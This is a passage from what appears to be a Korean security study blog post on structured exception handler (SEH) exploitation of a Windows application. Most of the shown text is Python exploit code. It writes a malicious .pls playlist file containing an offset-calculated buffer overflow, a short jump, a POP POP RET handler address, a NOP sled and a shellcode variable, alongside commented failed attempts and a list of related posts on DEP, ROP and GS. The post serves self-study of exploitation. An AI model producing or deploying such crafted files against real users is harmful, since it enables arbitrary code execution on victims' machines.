h9Mi0Mi1Mi2Mi3Mi4Mi5Mi6Mi7Mi8Mi9Mj0Mj1Mj2Mj3Mj4Mj5Mj6Mj7Mj8Mj9Mk0Mk1Mk2Mk3Mk4Mk5Mk6Mk7Mk8Mk9Ml0Ml1Ml2Ml3Ml4Ml5Ml6Ml7Ml8Ml9Mm0Mm1Mm2Mm3Mm4Mm5Mm6Mm7Mm8Mm9Mn0Mn1Mn2Mn3Mn4Mn5Mn6Mn7Mn8Mn9Mo0Mo1Mo2Mo3Mo4Mo5Mo6Mo7Mo8Mo9Mp0Mp1Mp2Mp3Mp4Mp5Mp6Mp7Mp8Mp9Mq0Mq1Mq2Mq3Mq4Mq5Mq6Mq7Mq8Mq9Mr0Mr1Mr2Mr3Mr4Mr5Mr6Mr7Mr8Mr9Ms0Ms1Ms2Ms3Ms4Ms5Ms6Ms7Ms8Ms9Mt0Mt1Mt2Mt3Mt4Mt5Mt6Mt7Mt8Mt9Mu0Mu1Mu2Mu3Mu4Mu5Mu6Mu7Mu8Mu9Mv0Mv1Mv2M"
# 784 offset == SEH HANDLER
# lecture author choi sun
#seh_next = struct.pack('<L',0x909010EB) # SEH_NEXT
#seh_handler = struct.pack('<L',0x00407A9D) # SEH_HANDLER => POP POP RET
#payload = "A" * (784-4) + seh_next + seh_handler + "\x90" * 15 + buf + "B" * 6000
# my_idea
#seh_next = struct.pack('<L',0x90909090) # SEH_NEXT
#seh_handler = struct.pack('<L',0xFFFFFFFF) # SEH_HANDLER
# pop pop ret == seh_handler
# pop pop ret => !mona seh => must safe SEH = failed
#seh_handler = struct.pack('<L',0x0040793f) # SEH_HANDLER => POP POP RET
#payload = "A" * (784-4) + seh_next + seh_handler + buf + "B" * 6000
#seh_next = struct.pack('<L',0x90909090)
#seh_handler = struct.pack('<L',0x0040793F)
#payload = "A" * (784-4) + seh_next + seh_handler + buf + "B" * 6000
seh_next = struct.pack('<L',0x909012EB)
seh_handler = struct.pack('<L',0x0040793F)
payload = "A" * 780 + seh_next + seh_handler + "\x90" * 15 + buf + "B" * 6000
#f = open("test.m3u", "wb")
f = open("RE_myidea04.pls","wb")
f.write(payload[:6000]) #until 6000byte
f.close()
'0x04 pwnable > 윈도우즈 어플리케이션 취약점 분석' 카테고리의 다른 글
| ROP2 (0) | 2018.01.17 |
|---|---|
| DEP 그리고 ROP (AKA 준나 어렵네) (0) | 2018.01.11 |
| SEH Handler 공부 (0) | 2018.01.09 |
| SEH 기초공부 1 (0) | 2018.01.09 |
| GS 기초 공부 1 (0) | 2018.01.09 |